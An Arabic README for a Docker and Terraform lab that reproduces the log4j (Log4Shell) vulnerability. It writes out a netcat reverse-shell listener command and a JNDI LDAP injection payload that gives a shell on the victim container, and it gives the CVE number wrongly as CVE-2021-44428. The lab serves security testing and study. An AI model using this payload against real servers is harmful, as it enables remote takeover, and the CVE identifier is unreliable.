
# موارد Terraform وDocker للإعداد السريع لاختبار CVE-2021-44428
تم إعداد هذا المستودع لاختبار ثغرة log4j بسرعة باستخدام Docker و Hashicorp Terraform. جميع مكونات هذا الاختبار ستعمل داخل حاويات Docker على شبكة Docker، ويمكن الوصول إليها عبر 'host.docker.internal'.
بيئة الاختبار هذه مشتقة من مقالة رائعة على مدونة Raxis: (https://raxis.com/blog/log4j-exploit)
التطبيق الضعيف وكود الاستغلال جاءا من cyberxml (https://github.com/cyberxml/log4j-poc).
كل ما قمت به هو توثيق البيئة لتسهيل تشغيل واختبار هذا الاستغلال اللذيذ.
أنا لا أتحمل أي مسؤولية عن الآثار السلبية أو الإجراءات الخبيثة التي قد تنتج عن استخدام المواد الموجودة في هذا المستودع. نقطة وانتهى. الأمر متروك لك لتقرر ما إذا كانت هذه المواد جديرة بالثقة، ومن مسؤوليتك أيضًا استخدام هذه المعلومات بشكل أخلاقي. أنا فقط أنشر هذه الأشياء الجيدة حتى يتمكن الباحثون والطلاب ومتخصصو الأمن من إنشاء بيئة بسرعة واختبار الاستغلال بأنفسهم. Seacrest out.
ادخل إلى حاوية log4j_netcat باستخدام 'docker exec -it netcat /bin/bash' أو أمر مشابه. هنا ستستقبل اتصال الصدفة الخاص بك إلى الخادم الضحية بمجرد إنشائه.
داخل جلستك في حاوية log4j_netcat، أدخل الأمر التالي لبدء المستمع:
nc -lv -s 0.0.0.0 -p 9001
في متصفحك، انتقل إلى http://host.docker.internal:8080/log4shell/
أدخل ما يلي في حقل 'Username' مع أي شيء تريده في حقل 'Password':
${jndi:ldap://host.docker.internal:1389/a}
عد إلى صدفة حاوية log4j_netcat ولاحظ أنك اتصلت بالخادم الضحية.
اذهب وأحدث الفوضى!